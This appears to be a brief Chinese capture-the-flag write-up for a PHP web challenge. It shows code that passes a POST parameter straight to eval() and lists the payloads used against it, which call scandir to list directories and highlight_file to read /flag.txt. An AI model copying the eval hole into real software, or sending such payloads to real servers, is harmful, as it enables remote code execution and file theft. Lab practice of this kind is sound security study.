信息收集
print_r
被禁用了
if(isset($_POST['c'])){$c= $_POST['c'];eval($c);
}else{highlight_file(__FILE__);
}
解题
和上题一样,flag不在flag.php
c=var_dump(scandir(getcwd()));
c=highlight_file("flag.txt");
c=var_dump(scandir('/'));

c=highlight_file("/flag.txt");

web66 目录 web68